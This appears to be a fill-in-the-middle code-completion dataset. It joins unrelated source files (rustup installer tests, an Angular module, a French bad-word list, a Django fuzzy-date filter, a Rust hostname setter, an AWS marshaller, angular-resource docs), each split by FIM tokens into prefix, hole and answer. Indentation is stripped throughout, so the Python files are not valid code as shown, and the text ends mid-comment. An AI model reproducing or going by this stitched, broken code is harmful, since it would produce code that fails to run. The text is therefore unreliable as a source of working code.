stg1 = 'JRQMKY1'
# stg1 = '6298JY1'
dic = cmdbServer(stg1)
#print dicts
if dic:
for k,v in dic.items():
print k,v
iddc = idcContact(stg1)
if iddc:
for k,v in iddc.items():
print k,v
dellcs = dellServerInfo(stg1)
if dellcs:
for k,v in dellcs.items():
print k,v<|fim▁end|>
|
#coding: utf-8
|
<|file_name|>cli-inst-interactive.rs<|end_file_name|><|fim▁begin|>//! Tests of the interactive console installer
pub mod mock;
use crate::mock::clitools::{
self, expect_ok, expect_stderr_ok, expect_stdout_ok, set_current_dist_date, this_host_triple,
Config, SanitizedOutput, Scenario,
};
use crate::mock::{get_path, restore_path};
use lazy_static::lazy_static;
use rustup::utils::raw;
use std::fs;
use std::io::Write;
use std::process::Stdio;
use std::sync::Mutex;
macro_rules! for_host {
($s: expr) => {
&format!($s, this_host_triple())
};
}
pub fn setup_(complex: bool, f: &dyn Fn(&Config)) {
let scenario = if complex {
Scenario::UnavailableRls
} else {
Scenario::SimpleV2
};
clitools::setup(scenario, &|config| {
// Lock protects environment variables
lazy_static! {
static ref LOCK: Mutex<()> = Mutex::new(());
}
let _g = LOCK.lock();
        // On Windows these tests mess with the user's PATH. Save
// and restore them here to keep from trashing things.
let saved_path = get_path();
let _g = scopeguard::guard(saved_path, restore_path);
f(config);
});
}
pub fn setup(f: &dyn Fn(&Config)) {
setup_(false, f)
}
fn run_input(config: &Config, args: &[&str], input: &str) -> SanitizedOutput {
run_input_with_env(config, args, input, &[])
}
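// Runs the given rustup command with `input` piped to its stdin and the extra
// environment variables applied, capturing stdout/stderr for assertions.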
fn run_input_with_env(
config: &Config,
args: &[&str],
input: &str,
env: &[(&str, &str)],
) -> SanitizedOutput {
let mut cmd = clitools::cmd(config, args[0], &args[1..]);
clitools::env(config, &mut cmd);
for (key, value) in env.iter() {
cmd.env(key, value);
}
cmd.stdin(Stdio::piped());
cmd.stdout(Stdio::piped());
cmd.stderr(Stdio::piped());
let mut child = cmd.spawn().unwrap();
child
.stdin
.as_mut()
.unwrap()
.write_all(input.as_bytes())
.unwrap();
let out = child.wait_with_output().unwrap();
SanitizedOutput {
ok: out.status.success(),
stdout: String::from_utf8(out.stdout).unwrap(),
stderr: String::from_utf8(out.stderr).unwrap(),
}
}
#[test]
fn smoke_test() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "\n\n");
assert!(out.ok);
});
}
#[test]
fn update() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(config, &["rustup-init"], "\n\n");
assert!(out.ok, "stdout:\n{}\nstderr:\n{}", out.stdout, out.stderr);
});
}
// Testing that the right number of blank lines are printed after the
// 'pre-install' message and before the 'post-install' message.
#[test]
fn blank_lines_around_stderr_log_output_install() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "\n\n");
// During an interactive session, after "Press the Enter
// key..." the UI emits a blank line, then there is a blank
// line that comes from the user pressing enter, then log
// output on stderr, then an explicit blank line on stdout
// before printing $toolchain installed
assert!(out.stdout.contains(
r"
3) Cancel installation
>
stable installed - 1.1.0 (hash-stable-1.1.0)
Rust is installed now. Great!
"
));
});
}
#[test]
fn blank_lines_around_stderr_log_output_update() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(
config,
&["rustup-init", "--no-update-default-toolchain"],
"\n\n",
);
println!("-- stdout --\n {}", out.stdout);
println!("-- stderr --\n {}", out.stderr);
assert!(out.stdout.contains(
r"
3) Cancel installation
>
Rust is installed now. Great!
"
));
});<|fim▁hole|>}
#[test]
fn user_says_nope() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "n\n\n");
assert!(out.ok);
assert!(!config.cargodir.join("bin").exists());
});
}
#[test]
fn with_no_modify_path() {
setup(&|config| {
let out = run_input(config, &["rustup-init", "--no-modify-path"], "\n\n");
assert!(out.ok);
assert!(out
.stdout
.contains("This path needs to be in your PATH environment variable"));
if cfg!(unix) {
assert!(!config.homedir.join(".profile").exists());
}
});
}
#[test]
fn with_no_toolchain() {
setup(&|config| {
let out = run_input(config, &["rustup-init", "--default-toolchain=none"], "\n\n");
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "no active toolchain");
});
}
#[test]
fn with_non_default_toolchain() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init", "--default-toolchain=nightly"],
"\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
});
}
#[test]
fn with_non_release_channel_non_default_toolchain() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init", "--default-toolchain=nightly-2015-01-02"],
"\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
expect_stdout_ok(config, &["rustup", "show"], "2015-01-02");
});
}
#[test]
fn set_nightly_toolchain() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\nnightly\n\n\n\n\n");
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "nightly");
});
}
#[test]
fn set_no_modify_path() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\n\n\nno\n\n\n");
assert!(out.ok);
if cfg!(unix) {
assert!(!config.homedir.join(".profile").exists());
}
});
}
#[test]
fn set_nightly_toolchain_and_unset() {
setup(&|config| {
let out = run_input(
config,
&["rustup-init"],
"2\n\nnightly\n\n\n2\n\nbeta\n\n\n\n\n",
);
assert!(out.ok);
expect_stdout_ok(config, &["rustup", "show"], "beta");
});
}
#[test]
fn user_says_nope_after_advanced_install() {
setup(&|config| {
let out = run_input(config, &["rustup-init"], "2\n\n\n\n\nn\n\n\n");
assert!(out.ok);
assert!(!config.cargodir.join("bin").exists());
});
}
#[test]
fn install_with_components() {
fn go(comp_args: &[&str]) {
let mut args = vec!["rustup-init", "-y"];
args.extend_from_slice(comp_args);
setup(&|config| {
expect_ok(config, &args);
expect_stdout_ok(
config,
&["rustup", "component", "list"],
"rust-src (installed)",
);
expect_stdout_ok(
config,
&["rustup", "component", "list"],
&format!("rust-analysis-{} (installed)", this_host_triple()),
);
})
}
go(&["-c", "rust-src", "-c", "rust-analysis"]);
go(&["-c", "rust-src,rust-analysis"]);
}
#[test]
fn install_forces_and_skips_rls() {
setup_(true, &|config| {
set_current_dist_date(config, "2015-01-01");
let out = run_input(
config,
&[
"rustup-init",
"--profile",
"complete",
"--default-toolchain",
"nightly",
],
"\n\n",
);
assert!(out.ok);
assert!(out
.stderr
.contains("warning: Force-skipping unavailable component"));
});
}
#[test]
fn test_warn_if_complete_profile_is_used() {
setup(&|config| {
expect_stderr_ok(
config,
&["rustup-init", "-y", "--profile", "complete"],
"warning: downloading with complete profile",
);
});
}
fn create_rustup_sh_metadata(config: &Config) {
let rustup_dir = config.homedir.join(".rustup");
fs::create_dir_all(&rustup_dir).unwrap();
let version_file = rustup_dir.join("rustup-version");
raw::write_file(&version_file, "").unwrap();
}
#[test]
fn test_prompt_fail_if_rustup_sh_already_installed_reply_nothing() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "\n");
assert!(!out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_prompt_fail_if_rustup_sh_already_installed_reply_no() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "no\n");
assert!(!out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_prompt_succeed_if_rustup_sh_already_installed_reply_yes() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init"], "yes\n\n\n");
assert!(out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stdout.contains("Continue? (y/N)"));
assert!(!out.stdout.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
))
})
}
#[test]
fn test_warn_succeed_if_rustup_sh_already_installed_y_flag() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input(config, &["rustup-init", "-y"], "");
assert!(out.ok);
assert!(out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(out.stderr.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
));
assert!(!out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn test_succeed_if_rustup_sh_already_installed_env_var_set() {
setup(&|config| {
create_rustup_sh_metadata(&config);
let out = run_input_with_env(
config,
&["rustup-init", "-y"],
"",
&[("RUSTUP_INIT_SKIP_EXISTENCE_CHECKS", "yes")],
);
assert!(out.ok);
assert!(!out
.stderr
.contains("warning: it looks like you have existing rustup.sh metadata"));
assert!(!out
.stderr
.contains("error: cannot install while rustup.sh is installed"));
assert!(!out.stderr.contains(
"warning: continuing (because the -y flag is set and the error is ignorable)"
));
assert!(!out.stdout.contains("Continue? (y/N)"));
})
}
#[test]
fn installing_when_already_installed_updates_toolchain() {
setup(&|config| {
run_input(config, &["rustup-init"], "\n\n");
let out = run_input(config, &["rustup-init"], "\n\n");
println!("stdout:\n{}\n...\n", out.stdout);
assert!(out
.stdout
.contains(for_host!("stable-{} unchanged - 1.1.0 (hash-stable-1.1.0)")));
})
}<|fim▁end|>
| |
<|file_name|>static-module.module.ts<|end_file_name|><|fim▁begin|>import {
StarRatingModule,
StarRatingConfigService,
} from '@angular-star-rating-lib/angular-star-rating';
import { CommonModule } from '@angular/common';
import { NgModule } from '@angular/core';
import { RouterModule } from '@angular/router';
import { CustomConfigComponent } from './custom-config.component';
import { CustomLocalConfigComponent } from './custom-local-config.component';
import { CustomConfigService } from './custom-config.service';
@NgModule({
imports: [<|fim▁hole|> RouterModule.forChild([
{
path: 'static-config-override',
component: CustomConfigComponent,
},
]),
],
declarations: [CustomConfigComponent, CustomLocalConfigComponent],
providers: [
{
provide: StarRatingConfigService,
useClass: CustomConfigService,
},
],
})
export class StaticModuleModule {}<|fim▁end|>
|
CommonModule,
StarRatingModule.forChild(),
|
<|file_name|>french.py<|end_file_name|><|fim▁begin|>import sys
from .space_delimited import SpaceDelimited
try:
from nltk.stem.snowball import SnowballStemmer
stemmer = SnowballStemmer("french")
except ValueError:
raise ImportError("Could not load stemmer for {0}. ".format(__name__))
try:
from nltk.corpus import stopwords as nltk_stopwords
stopwords = set(nltk_stopwords.words('french') + ["a"])
except LookupError:
raise ImportError("Could not load stopwords for {0}. ".format(__name__) +
"You may need to install the nltk 'stopwords' " +
"corpora. See http://www.nltk.org/data.html")
try:
import enchant
dictionary = enchant.Dict("fr")
except enchant.errors.DictNotFoundError:
raise ImportError("No enchant-compatible dictionary found for 'fr'. " +
"Consider installing 'myspell-fr'.")
badwords = [
r"con",
r"fesse", r"foutre",
r"merde+", r"merdique",
r"prostituee?", r"putain", r"putes",
r"salop", r"stupide",
]
sys.modules[__name__] = SpaceDelimited(
__name__,
doc="""
french
======
revision
--------
.. autoattribute:: revision.words
.. autoattribute:: revision.content_words
.. autoattribute:: revision.badwords
.. autoattribute:: revision.misspellings
.. autoattribute:: revision.infonoise
parent_revision
---------------
.. autoattribute:: parent_revision.words
.. autoattribute:: parent_revision.content_words
.. autoattribute:: parent_revision.badwords
.. autoattribute:: parent_revision.misspellings<|fim▁hole|>----
.. autoattribute:: diff.words_added
.. autoattribute:: diff.words_removed
.. autoattribute:: diff.badwords_added
.. autoattribute:: diff.badwords_removed
.. autoattribute:: diff.misspellings_added
.. autoattribute:: diff.misspellings_removed
""",
badwords=badwords,
dictionary=dictionary,
stemmer=stemmer,
stopwords=stopwords
)<|fim▁end|>
|
.. autoattribute:: parent_revision.infonoise
diff
|
<|file_name|>Mailer.js<|end_file_name|><|fim▁begin|>import { sendMail } from '../functions/sendMail';
import { unsubscribe } from '../functions/unsubscribe';
export const Mailer = {
sendMail,<|fim▁hole|><|fim▁end|>
|
unsubscribe,
};
|
<|file_name|>OioOioSocketCompatibleObjectStreamEchoTest.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.jboss.netty.handler.codec.serialization;
import java.util.concurrent.Executor;<|fim▁hole|>import org.jboss.netty.channel.socket.oio.OioServerSocketChannelFactory;
public class OioOioSocketCompatibleObjectStreamEchoTest extends AbstractSocketCompatibleObjectStreamEchoTest {
@Override
protected ChannelFactory newClientSocketChannelFactory(Executor executor) {
return new OioClientSocketChannelFactory(executor);
}
@Override
protected ChannelFactory newServerSocketChannelFactory(Executor executor) {
return new OioServerSocketChannelFactory(executor, executor);
}
}<|fim▁end|>
|
import org.jboss.netty.channel.ChannelFactory;
import org.jboss.netty.channel.socket.oio.OioClientSocketChannelFactory;
|
<|file_name|>loop.js<|end_file_name|><|fim▁begin|>import {stats} from './stats.js';
import {core} from './core.js';
import {tasks} from './tasks.js';
const scenesRenderInfo = {}; // Used for throttling FPS for each Scene
const tickEvent = {
sceneId: null,
time: null,
startTime: null,
prevTime: null,
deltaTime: null
};
const taskBudget = 10; // Millisecs we're allowed to spend on tasks in each frame
const fpsSamples = [];
const numFPSSamples = 30;
let lastTime = 0;
let elapsedTime;
let totalFPS = 0;
const frame = function () {
let time = Date.now();
if (lastTime > 0) { // Log FPS stats
elapsedTime = time - lastTime;
var newFPS = 1000 / elapsedTime; // Moving average of FPS
totalFPS += newFPS;
fpsSamples.push(newFPS);
if (fpsSamples.length >= numFPSSamples) {
totalFPS -= fpsSamples.shift();
}
stats.frame.fps = Math.round(totalFPS / fpsSamples.length);
}
runTasks(time);
fireTickEvents(time);
renderScenes();
lastTime = time;
window.requestAnimationFrame(frame);
};
function runTasks(time) { // Process as many enqueued tasks as we can within the per-frame task budget
const tasksRun = tasks.runTasks(time + taskBudget);
const tasksScheduled = tasks.getNumTasks();
stats.frame.tasksRun = tasksRun;
stats.frame.tasksScheduled = tasksScheduled;
stats.frame.tasksBudget = taskBudget;
}
function fireTickEvents(time) { // Fire tick event on each Scene
tickEvent.time = time;
for (var id in core.scenes) {
if (core.scenes.hasOwnProperty(id)) {
var scene = core.scenes[id];
tickEvent.sceneId = id;
tickEvent.startTime = scene.startTime;
tickEvent.deltaTime = tickEvent.prevTime != null ? tickEvent.time - tickEvent.prevTime : 0;
/**
* Fired on each game loop iteration.
*
* @event tick
* @param {String} sceneID The ID of this Scene.
* @param {Number} startTime The time in seconds since 1970 that this Scene was instantiated.<|fim▁hole|> */
scene.fire("tick", tickEvent, true);
}
}
tickEvent.prevTime = time;
}
function renderScenes() {
const scenes = core.scenes;
const forceRender = false;
let scene;
let renderInfo;
let ticksPerRender;
let id;
for (id in scenes) {
if (scenes.hasOwnProperty(id)) {
scene = scenes[id];
renderInfo = scenesRenderInfo[id];
if (!renderInfo) {
renderInfo = scenesRenderInfo[id] = {}; // FIXME
}
ticksPerRender = scene.ticksPerRender;
if (renderInfo.ticksPerRender !== ticksPerRender) {
renderInfo.ticksPerRender = ticksPerRender;
renderInfo.renderCountdown = ticksPerRender;
}
if (--renderInfo.renderCountdown === 0) {
scene.render(forceRender);
renderInfo.renderCountdown = ticksPerRender;
}
}
}
}
window.requestAnimationFrame(frame);
const loop = {};
export{loop};<|fim▁end|>
|
* @param {Number} time The time in seconds since 1970 of this "tick" event.
* @param {Number} prevTime The time of the previous "tick" event from this Scene.
* @param {Number} deltaTime The time in seconds since the previous "tick" event from this Scene.
|
<|file_name|>test.splitRange.js<|end_file_name|><|fim▁begin|><|fim▁hole|>/**
* Created by tushar.mathur on 26/01/16.
*/
'use strict'
import test from 'ava'
import splitRange from '../src/splitRange'
test((t) => {
t.same(splitRange(100, 2), [[0, 49], [50, 100]])
t.same(splitRange(100, 3), [[0, 32], [33, 65], [66, 100]])
})<|fim▁end|>
| |
<|file_name|>dates.py<|end_file_name|><|fim▁begin|>import logging
from datetime import datetime
from django import template
from django.utils import timezone
register = template.Library()
logger = logging.getLogger(__name__)
@register.filter(expects_localtime=True)
def fuzzy_time(time):
"""Formats a `datetime.time` object relative to the current time."""
dt = time_to_date(time)
return fuzzy_date(dt)
@register.filter(expects_localtime=True)
def time_to_date(time):
"""Returns a `datetime.datetime` object from a `datetime.time` object using the current date."""
return datetime.combine(timezone.localdate(), time)
@register.filter(expects_localtime=True)
def fuzzy_date(date):
"""Formats a `datetime.datetime` object relative to the current time."""
if date.tzinfo is None:
date = timezone.make_aware(date)
<|fim▁hole|> if date <= now:
diff = now - date
seconds = diff.total_seconds()
minutes = seconds // 60
hours = minutes // 60
if minutes <= 1:
return "moments ago"
elif minutes < 60:
return "{} minutes ago".format(int(seconds // 60))
elif hours < 24:
hrs = int(diff.seconds // (60 * 60))
return "{} hour{} ago".format(hrs, "s" if hrs != 1 else "")
elif diff.days == 1:
return "yesterday"
elif diff.days < 7:
return "{} days ago".format(int(seconds // (60 * 60 * 24)))
elif diff.days < 14:
return date.strftime("last %A")
else:
return date.strftime("%A, %B %d, %Y")
else:
diff = date - now
seconds = diff.total_seconds()
minutes = seconds // 60
hours = minutes // 60
if minutes <= 1:
            return "in a few moments"
elif minutes < 60:
return "in {} minutes".format(int(seconds // 60))
elif hours < 24:
hrs = int(diff.seconds // (60 * 60))
return "in {} hour{}".format(hrs, "s" if hrs != 1 else "")
elif diff.days == 1:
return "tomorrow"
elif diff.days < 7:
return "in {} days".format(int(seconds // (60 * 60 * 24)))
elif diff.days < 14:
return date.strftime("next %A")
else:
return date.strftime("%A, %B %d, %Y")<|fim▁end|>
|
now = timezone.localtime()
|
<|file_name|>AccountDetailMarshaller.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.macie2.model.transform;
import javax.annotation.Generated;
import com.amazonaws.SdkClientException;
import com.amazonaws.services.macie2.model.*;
import com.amazonaws.protocol.*;
import com.amazonaws.annotation.SdkInternalApi;
/**
* AccountDetailMarshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
@SdkInternalApi
public class AccountDetailMarshaller {
private static final MarshallingInfo<String> ACCOUNTID_BINDING = MarshallingInfo.builder(MarshallingType.STRING).marshallLocation(MarshallLocation.PAYLOAD)
.marshallLocationName("accountId").build();
private static final MarshallingInfo<String> EMAIL_BINDING = MarshallingInfo.builder(MarshallingType.STRING).marshallLocation(MarshallLocation.PAYLOAD)
.marshallLocationName("email").build();
private static final AccountDetailMarshaller instance = new AccountDetailMarshaller();
public static AccountDetailMarshaller getInstance() {
return instance;
}
/**
* Marshall the given parameter object.
*/<|fim▁hole|>
if (accountDetail == null) {
throw new SdkClientException("Invalid argument passed to marshall(...)");
}
try {
protocolMarshaller.marshall(accountDetail.getAccountId(), ACCOUNTID_BINDING);
protocolMarshaller.marshall(accountDetail.getEmail(), EMAIL_BINDING);
} catch (Exception e) {
throw new SdkClientException("Unable to marshall request to JSON: " + e.getMessage(), e);
}
}
}<|fim▁end|>
|
public void marshall(AccountDetail accountDetail, ProtocolMarshaller protocolMarshaller) {
|
<|file_name|>hostname.rs<|end_file_name|><|fim▁begin|>use std::borrow::Cow;
use into_cow::IntoCow;
use config::Config;
use nix;
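/// Config step that applies the given hostname via sethostname(2) when `prepare` is called.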
pub struct Hostname<'a> {
hostname: Cow<'a, str>,
}
impl<'a> Hostname<'a> {
pub fn new<H: IntoCow<'a, str>>(hostname: H) -> Self {
Hostname {
hostname: hostname.into_cow(),
}
}<|fim▁hole|>impl<'a> Config for Hostname<'a> {
fn prepare(&self) -> nix::Result<()> {
nix::unistd::sethostname(self.hostname.as_bytes())
}
}<|fim▁end|>
|
}
|
<|file_name|>angular-resource.js<|end_file_name|><|fim▁begin|>/**
* @license AngularJS v1.6.10
* (c) 2010-2018 Google, Inc. http://angularjs.org
* License: MIT
*/
(function(window, angular) {'use strict';
var $resourceMinErr = angular.$$minErr('$resource');
// Helper functions and regex to lookup a dotted path on an object
// stopping at undefined/null. The path must be composed of ASCII
// identifiers (just like $parse)
var MEMBER_NAME_REGEX = /^(\.[a-zA-Z_$@][0-9a-zA-Z_$@]*)+$/;
function isValidDottedPath(path) {
return (path != null && path !== '' && path !== 'hasOwnProperty' &&
MEMBER_NAME_REGEX.test('.' + path));
}
function lookupDottedPath(obj, path) {
if (!isValidDottedPath(path)) {
throw $resourceMinErr('badmember', 'Dotted member path "@{0}" is invalid.', path);
}
var keys = path.split('.');
for (var i = 0, ii = keys.length; i < ii && angular.isDefined(obj); i++) {
var key = keys[i];
obj = (obj !== null) ? obj[key] : undefined;
}
return obj;
}
/**
* Create a shallow copy of an object and clear other fields from the destination
*/
function shallowClearAndCopy(src, dst) {
dst = dst || {};
angular.forEach(dst, function(value, key) {
delete dst[key];
});
for (var key in src) {
if (src.hasOwnProperty(key) && !(key.charAt(0) === '$' && key.charAt(1) === '$')) {
dst[key] = src[key];
}
}
return dst;
}
/**
* @ngdoc module
* @name ngResource
* @description
*
* The `ngResource` module provides interaction support with RESTful services
* via the $resource service.
*
* See {@link ngResource.$resourceProvider} and {@link ngResource.$resource} for usage.
*/
/**
* @ngdoc provider
* @name $resourceProvider
*
* @description<|fim▁hole|> * service.
*
* ## Dependencies
* Requires the {@link ngResource } module to be installed.
*
*/
/**
* @ngdoc service
* @name $resource
* @requires $http
* @requires ng.$log
* @requires $q
* @requires ng.$timeout
*
* @description
* A factory which creates a resource object that lets you interact with
* [RESTful](http://en.wikipedia.org/wiki/Representational_State_Transfer) server-side data sources.
*
* The returned resource object has action methods which provide high-level behaviors without
* the need to interact with the low level {@link ng.$http $http} service.
*
* Requires the {@link ngResource `ngResource`} module to be installed.
*
* By default, trailing slashes will be stripped from the calculated URLs,
* which can pose problems with server backends that do not expect that
* behavior. This can be disabled by configuring the `$resourceProvider` like
* this:
*
* ```js
app.config(['$resourceProvider', function($resourceProvider) {
// Don't strip trailing slashes from calculated URLs
$resourceProvider.defaults.stripTrailingSlashes = false;
}]);
* ```
*
* @param {string} url A parameterized URL template with parameters prefixed by `:` as in
* `/user/:username`. If you are using a URL with a port number (e.g.
* `http://example.com:8080/api`), it will be respected.
*
* If you are using a url with a suffix, just add the suffix, like this:
* `$resource('http://example.com/resource.json')` or `$resource('http://example.com/:id.json')`
* or even `$resource('http://example.com/resource/:resource_id.:format')`
* If the parameter before the suffix is empty, :resource_id in this case, then the `/.` will be
* collapsed down to a single `.`. If you need this sequence to appear and not collapse then you
* can escape it with `/\.`.
*
* @param {Object=} paramDefaults Default values for `url` parameters. These can be overridden in
* `actions` methods. If a parameter value is a function, it will be called every time
* a param value needs to be obtained for a request (unless the param was overridden). The function
* will be passed the current data value as an argument.
*
* Each key value in the parameter object is first bound to url template if present and then any
* excess keys are appended to the url search query after the `?`.
*
* Given a template `/path/:verb` and parameter `{verb:'greet', salutation:'Hello'}` results in
* URL `/path/greet?salutation=Hello`.
*
* If the parameter value is prefixed with `@`, then the value for that parameter will be
* extracted from the corresponding property on the `data` object (provided when calling actions
* with a request body).
* For example, if the `defaultParam` object is `{someParam: '@someProp'}` then the value of
* `someParam` will be `data.someProp`.
* Note that the parameter will be ignored, when calling a "GET" action method (i.e. an action
* method that does not accept a request body)
*
* @param {Object.<Object>=} actions Hash with declaration of custom actions that will be available
* in addition to the default set of resource actions (see below). If a custom action has the same
* key as a default action (e.g. `save`), then the default action will be *overwritten*, and not
* extended.
*
* The declaration should be created in the format of {@link ng.$http#usage $http.config}:
*
* {action1: {method:?, params:?, isArray:?, headers:?, ...},
* action2: {method:?, params:?, isArray:?, headers:?, ...},
* ...}
*
* Where:
*
* - **`action`** – {string} – The name of action. This name becomes the name of the method on
* your resource object.
* - **`method`** – {string} – Case insensitive HTTP method (e.g. `GET`, `POST`, `PUT`,
* `DELETE`, `JSONP`, etc).
* - **`params`** – {Object=} – Optional set of pre-bound parameters for this action. If any of
* the parameter value is a function, it will be called every time when a param value needs to
* be obtained for a request (unless the param was overridden). The function will be passed the
* current data value as an argument.
* - **`url`** – {string} – action specific `url` override. The url templating is supported just
* like for the resource-level urls.
* - **`isArray`** – {boolean=} – If true then the returned object for this action is an array,
* see `returns` section.
* - **`transformRequest`** –
* `{function(data, headersGetter)|Array.<function(data, headersGetter)>}` –
* transform function or an array of such functions. The transform function takes the http
* request body and headers and returns its transformed (typically serialized) version.
* By default, transformRequest will contain one function that checks if the request data is
* an object and serializes it using `angular.toJson`. To prevent this behavior, set
* `transformRequest` to an empty array: `transformRequest: []`
* - **`transformResponse`** –
* `{function(data, headersGetter, status)|Array.<function(data, headersGetter, status)>}` –
* transform function or an array of such functions. The transform function takes the http
* response body, headers and status and returns its transformed (typically deserialized)
* version.
* By default, transformResponse will contain one function that checks if the response looks
* like a JSON string and deserializes it using `angular.fromJson`. To prevent this behavior,
* set `transformResponse` to an empty array: `transformResponse: []`
* - **`cache`** – `{boolean|Cache}` – If true, a default $http cache will be used to cache the
* GET request, otherwise if a cache instance built with
* {@link ng.$cacheFactory $cacheFactory} is supplied, this cache will be used for
* caching.
* - **`timeout`** – `{number}` – timeout in milliseconds.<br />
* **Note:** In contrast to {@link ng.$http#usage $http.config}, {@link ng.$q promises} are
* **not** supported in $resource, because the same value would be used for multiple requests.
* If you are looking for a way to cancel requests, you should use the `cancellable` option.
* - **`cancellable`** – `{boolean}` – if set to true, the request made by a "non-instance" call
* will be cancelled (if not already completed) by calling `$cancelRequest()` on the call's
* return value. Calling `$cancelRequest()` for a non-cancellable or an already
* completed/cancelled request will have no effect.<br />
* - **`withCredentials`** - `{boolean}` - whether to set the `withCredentials` flag on the
* XHR object. See
* [requests with credentials](https://developer.mozilla.org/en/http_access_control#section_5)
* for more information.
* - **`responseType`** - `{string}` - see
* [requestType](https://developer.mozilla.org/en-US/docs/DOM/XMLHttpRequest#responseType).
* - **`interceptor`** - `{Object=}` - The interceptor object has two optional methods -
* `response` and `responseError`. Both `response` and `responseError` interceptors get called
* with `http response` object. See {@link ng.$http $http interceptors}. In addition, the
* resource instance or array object is accessible by the `resource` property of the
* `http response` object.
* Keep in mind that the associated promise will be resolved with the value returned by the
* response interceptor, if one is specified. The default response interceptor returns
* `response.resource` (i.e. the resource instance or array).
* - **`hasBody`** - `{boolean}` - allows to specify if a request body should be included or not.
* If not specified only POST, PUT and PATCH requests will have a body.
*
* @param {Object} options Hash with custom settings that should extend the
* default `$resourceProvider` behavior. The supported options are:
*
* - **`stripTrailingSlashes`** – {boolean} – If true then the trailing
* slashes from any calculated URL will be stripped. (Defaults to true.)
* - **`cancellable`** – {boolean} – If true, the request made by a "non-instance" call will be
* cancelled (if not already completed) by calling `$cancelRequest()` on the call's return value.
* This can be overwritten per action. (Defaults to false.)
*
* @returns {Object} A resource "class" object with methods for the default set of resource actions
* optionally extended with custom `actions`. The default set contains these actions:
* ```js
* { 'get': {method:'GET'},
* 'save': {method:'POST'},
* 'query': {method:'GET', isArray:true},
* 'remove': {method:'DELETE'},
* 'delete': {method:'DELETE'} };
* ```
*
* Calling these methods invoke an {@link ng.$http} with the specified http method,
* destination and parameters. When the data is returned from the server then the object is an
* instance of the resource class. The actions `save`, `remove` and `delete` are available on it
* as methods with the `$` prefix. This allows you to easily perform CRUD operations (create,
* read, update, delete) on server-side data like this:
* ```js
* var User = $resource('/user/:userId', {userId:'@id'});
* var user = User.get({userId:123}, function() {
* user.abc = true;
* user.$save();
* });
* ```
*
* It is important to realize that invoking a $resource object method immediately returns an
* empty reference (object or array depending on `isArray`). Once the data is returned from the
* server the existing reference is populated with the actual data. This is a useful trick since
* usually the resource is assigned to a model which is then rendered by the view. Having an empty
* object results in no rendering, once the data arrives from the server then the object is
* populated with the data and the view automatically re-renders itself showing the new data. This
* means that in most cases one never has to write a callback function for the action methods.
*
* The action methods on the class object or instance object can be invoked with the following
* parameters:
*
* - "class" actions without a body: `Resource.action([parameters], [success], [error])`
* - "class" actions with a body: `Resource.action([parameters], postData, [success], [error])`
* - instance actions: `instance.$action([parameters], [success], [error])`
*
*
* When calling instance methods, the instance itself is used as the request body (if the action
* should have a body). By default, only actions using `POST`, `PUT` or `PATCH` have request
* bodies, but you can use the `hasBody` configuration option to specify whether an action
* should have a body or not (regardless of its HTTP method).
*
*
* Success callback is called with (value (Object|Array), responseHeaders (Function),
* status (number), statusText (string)) arguments, where the value is the populated resource
* instance or collection object. The error callback is called with (httpResponse) argument.
*
* Class actions return empty instance (with additional properties below).
* Instance actions return promise of the action.
*
* The Resource instances and collections have these additional properties:
*
* - `$promise`: the {@link ng.$q promise} of the original server interaction that created this
* instance or collection.
*
* On success, the promise is resolved with the same resource instance or collection object,
* updated with data from server. This makes it easy to use in
* {@link ngRoute.$routeProvider resolve section of $routeProvider.when()} to defer view
* rendering until the resource(s) are loaded.
*
* On failure, the promise is rejected with the {@link ng.$http http response} object.
*
